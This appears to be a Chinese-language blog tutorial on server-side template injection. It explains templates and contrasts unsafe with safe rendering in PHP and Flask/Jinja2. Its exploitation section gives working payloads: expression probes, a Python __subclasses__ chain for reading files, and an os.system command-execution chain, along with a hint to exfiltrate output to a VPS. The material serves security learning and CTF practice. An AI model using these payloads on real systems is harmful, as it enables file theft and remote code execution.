SSTI(模板注入)基础总结

SSTI基础

SSTI:Server Side Template Injection,服务端模板注入。

因为作者也是首次学习此知识点,所有讲解可能会有些啰嗦,教程大概没有了解过模板的开发方式和模板注入的同学也可以听懂。

主要内容:

  • 模板是什么

  • 模板注入原理

  • Flask的介绍和利用

更新了一些题目,可供练手用。

原理

模板是什么

模板可以理解为一段固定好格式,等着你来填充信息的文件。通过这种方法,可以做到逻辑与视图分离,更容易、清楚且相对安全地编写前后端不同的逻辑。作为对比,一个很不好的解决方法是用脚本语言的字符串拼接html,然后统一输出。

这是一个模板的例子:



    
        {{title}}
    
    
        

This page took {{microtime(true) - time}} seconds to render.

对应的后端代码逻辑可以是:

$templateEngine = new TemplateEngine();
$tpl = $templateEngine->loadFile(login.tpl);
$tpl->assign('title','Login');
$tpl->assign('method','post');
$tpl->assign('action','login.php');
$tpl->assign('username',getUserNameFromCookie());
$tpl->assign('time',microtime(true));
$tmp->show();

模板注入基本原理

如果用户输入作为【模板当中变量 的值】,模板引擎一般会对用户输入进行编码转义,不容易造成XSS攻击。

render("Hello {{name}}", array("name" =>$_GET["name"]));  // 将用户输入作为模版变量的值
    echo $output;
?>

这段代码输入会原样输出,因为进行了HTML实体编码。

但是如果用户输入作为了【模板内容 的一部分】,用户输入会原样输出。

render("Hello {$_GET['name']}"); // 将用户输入作为模版内容的一部分
    echo $output;
?>

这段代码输入<script>alert(1)</script>会造成XSS漏洞。

如果输入Vuln{%23 comment %23}{{2*8}},会执行2*8这个语句,输出Hello Vuln16。因为经过渲染后,模板变成了Hello Vuln{# comment #}{{2\*8}}

不同的模板会有不同的语法,一般使用Detect-Identify-Expoit的利用流程。

识别不同模板

模板基础与利用方法

A.Python-Flask

它使用Jinja2作为渲染引擎

Jinja2.10.x Documention

a.路由

通过@的注解方式,将资源和函数对应起来。

from flask import flask 
@app.route('/index/')
def hello_word():
    return 'hello word'

app.route装饰器作用是把函数和URL绑定。

也就是说,访问http://host:port/index的时候,flask会返回HelloWorld

b.渲染

渲染的方法有render_templaterender_template_string两种。

render_template()是用来渲染一个指定的文件的

return render_template('index.html')

render_template_string则是用来渲染一个字符串的

html = '

This is index page

' return render_template_string(html)

c.模板使用

文件结构:在网站根目录下新建templates文件夹,存放html的模板文件。

Flask使用Jinja2这个渲染引擎,它是以{{}}作为变量包裹的标识符。同时,这个符号包裹内还可以执行一些简单的表达式。

模板的使用:示例


{{content}}

#test.py
from flask import *
@app.route('/index/')
def user_login():
    return render_template('index.html',content='This is index page.')

模板的不安全使用:示例

@app.route('/test/')
def test():
    code = request.args.get('id')
    html = '''
        

%s

'''%(code) return render_template_string(html)

这里直接将用户输入作为了模板,不会经过转义和过滤的步骤,很容易XSS。

模板的安全使用:示例

@app.route('/test/')
def test():
    code = request.args.get('id')
    return render_template_string('

{{ code }}

',code=code)

模板引擎会对输入变量进行编码转义。

d.利用方法

首先,Flask中有一些全局变量,例如:

{{config}}
{{requests.environ}}

主要是通过Python对象的继承,用魔术方法一步步找到可利用的方法去执行。即找到父类–>寻找子类–>找关于命令执行或者文件操作的模块。

对象的魔术方法:

__class__  返回类型所属的对象
__mro__    返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__base__   返回该对象所继承的基类
// __base__和__mro__都是用来寻找基类的

__subclasses__   每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__  类的初始化方法
__globals__  对包含函数全局变量的字典的引用

下面简单解释一下利用过程

文件读取
#获取''字符串的所属对象
>>> ''.__class__


#获取str类的父类
>>> ''.__class__.__mro__
(, )

#获取object类的所有子类
>>> ''.__class__.__mro__[1].__subclasses__()
[, , , , , , , , , , , ...
#有很多类,后面省略

现在只需要从这些类中寻找需要的类,用数组下标获取,然后执行该类中想要执行的函数即可。比如第41个类是file类,就可以构造利用:

''.__class__.__mro__[2].__subclasses__()[40]('').read()

再比如,如果没有file类,使用类,可以进行文件的读取。这里是第91个类。

''.__class__.__mro__[2].__subclasses__()[91].get_data(0,"")
命令执行

首先通过脚本找到包含os模块的类。

num = 0
for item in ''.__class__.__mro__[1].__subclasses__():
    try:
         if 'os' in item.__init__.__globals__:
             print (num,item)
         num+=1
    except:
        print ('-')
        num+=1

假设输出为x编号的类,则可以构造

''.__class__.__mro__[1].__subclasses__()[x].__init__.__globals__['os'].system('ls')

命令执行的结果如果不能直接看到,可以考虑通过curl工具发送到自己的VPS,或者使用CEYE平台。

执行脚本发现,包含os模块的类:



其他函数的利用同理。

e.练习题目

攻防世界:Web_python_template_injection ,Flask模板注入板子题,上述知识即可解决。

你可能感兴趣的:(SSTI(模板注入)基础总结)